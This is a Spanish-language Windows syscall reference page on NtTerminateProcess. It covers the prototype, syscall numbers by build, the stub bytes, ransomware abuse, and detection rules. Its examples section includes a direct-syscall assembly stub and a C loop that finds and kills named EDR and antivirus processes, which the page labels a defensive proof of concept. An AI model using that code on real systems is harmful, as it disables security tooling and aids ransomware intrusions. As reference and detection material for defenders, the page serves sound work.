> Windows Syscalls
ntoskrnl.exeT1562.001T1489T1106

NtTerminateProcess

Termina un proceso objetivo y todos sus hilos con un código de salida dado.

Prototipo

NTSTATUS NtTerminateProcess(
  HANDLE   ProcessHandle,
  NTSTATUS ExitStatus
);

Argumentos

NameTypeDirDescription
ProcessHandleHANDLEinHandle al proceso a terminar. Requiere PROCESS_TERMINATE. NULL significa «terminar todos los hilos del proceso actual excepto el llamador».
ExitStatusNTSTATUSinCódigo de salida reportado por GetExitCodeProcess y registrado en el objeto proceso.

IDs de syscalls por versión de Windows

Versión de WindowsID de syscallBuild
Win10 15070x2Cwin10-1507
Win10 16070x2Cwin10-1607
Win10 17030x2Cwin10-1703
Win10 17090x2Cwin10-1709
Win10 18030x2Cwin10-1803
Win10 18090x2Cwin10-1809
Win10 19030x2Cwin10-1903
Win10 19090x2Cwin10-1909
Win10 20040x2Cwin10-2004
Win10 20H20x2Cwin10-20h2
Win10 21H10x2Cwin10-21h1
Win10 21H20x2Cwin10-21h2
Win10 22H20x2Cwin10-22h2
Win11 21H20x2Cwin11-21h2
Win11 22H20x2Cwin11-22h2
Win11 23H20x2Cwin11-23h2
Win11 24H20x2Cwin11-24h2
Server 20160x2Cwinserver-2016
Server 20190x2Cwinserver-2019
Server 20220x2Cwinserver-2022
Server 20250x2Cwinserver-2025

Módulo del kernel

ntoskrnl.exeNtTerminateProcess

APIs relacionadas

TerminateProcessExitProcessNtTerminateThreadNtSuspendProcessNtOpenProcess

Stub del syscall

4C 8B D1            mov r10, rcx
B8 2C 00 00 00      mov eax, 0x2C
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Notas no documentadas

NtTerminateProcess mantiene el SSN `0x2C` en todos los builds de Windows 10 / 11 / Server. Es la implementación de kernel detrás de TerminateProcess / ExitProcess y también lo invocan implícitamente el `_exit` del runtime C y los finalizadores SEH de excepción no manejada. Llamarlo con ProcessHandle == NULL es un atajo documentado para matar todos los hilos del proceso actual salvo el llamador — la segunda mitad del teardown de `ExitProcess`.

Uso común por malware

El abuso definitorio es el **kill de EDR / AV** (T1562.001). Ransomware moderno (Conti, LockBit, BlackCat/ALPHV, Royal, Akira) y frameworks de post-explotación combinan habitualmente un driver vulnerable BYOVD (zemana, gmer, RTCore64) con un binario en modo usuario que recorre la lista de procesos, hace match contra una allowlist hardcodeada de nombres de EDR (MsMpEng, Sense, CSFalconService, elastic-agent, ...) y o bien baja al kernel para invocar directamente ZwTerminateProcess, o bien — una vez neutralizado el callback de protección del EDR — llama NtTerminateProcess desde modo usuario con PROCESS_TERMINATE. Otros usos: abortar un proceso helper inyectado tras entregar payload de movimiento lateral y droppers autodestructivos tras pasar al segundo stage.

Oportunidades de detección

Los callbacks PsSetCreateProcessNotifyRoutineEx se disparan al salir el proceso con `Create` == FALSE e incluyen tanto el terminador como la PID víctima; es la telemetría de oro. Sysmon Event ID 5 (`ProcessTerminate`) es mucho más liviano y carece del campo terminador. ETW `Microsoft-Windows-Kernel-Process/ProcessStop` provee los mismos datos. Regla de alta fidelidad: cualquier proceso no System, no csrss que termine un proceso cuya ruta de imagen viva bajo `Program Files\Windows Defender`, `Program Files\Microsoft\Windows Defender Advanced Threat Protection`, `Program Files\CrowdStrike`, `Program Files\SentinelOne` o raíces EDR similares. Combinar con telemetría de autoprotección de EDR (intentos de violación PPL sobre `MsMpEng.exe` de Defender).

Ejemplos de syscalls directos

asmx64 direct stub

; Direct syscall stub for NtTerminateProcess (SSN 0x2C, all builds)
NtTerminateProcess PROC
    mov  r10, rcx          ; syscall convention
    mov  eax, 2Ch          ; SSN
    syscall
    ret
NtTerminateProcess ENDP

cEDR kill loop (defensive PoC)

// Defensive PoC: enumerate processes, match against an EDR allowlist,
// and call NtTerminateProcess directly. Assumes prerequisites (token theft
// to SYSTEM, EDR protection callback already stripped via BYOVD) are met.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

typedef NTSTATUS (NTAPI *pNtTerminateProcess)(HANDLE, NTSTATUS);

static const wchar_t *kTargets[] = {
    L"MsMpEng.exe", L"MsSense.exe", L"CSFalconService.exe",
    L"elastic-agent.exe", L"SentinelAgent.exe", NULL,
};

void KillEDRs(void) {
    pNtTerminateProcess NtTerminateProcess = (pNtTerminateProcess)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtTerminateProcess");

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32W pe = { sizeof pe };
    for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
        for (size_t i = 0; kTargets[i]; ++i) {
            if (_wcsicmp(pe.szExeFile, kTargets[i]) == 0) {
                HANDLE h = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
                if (h) { NtTerminateProcess(h, 0); CloseHandle(h); }
            }
        }
    }
    CloseHandle(snap);
}

rustself-destruct on completion

// Cargo: windows-sys = "0.59" (Win32_System_Threading, Win32_Foundation)
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::Threading::GetCurrentProcess;

extern "system" {
    fn NtTerminateProcess(ProcessHandle: HANDLE, ExitStatus: i32) -> i32;
}

pub fn self_destruct(code: i32) -> ! {
    unsafe { NtTerminateProcess(GetCurrentProcess(), code); }
    loop {}
}

Mapeos MITRE ATT&CK

Last verified: 2026-05-20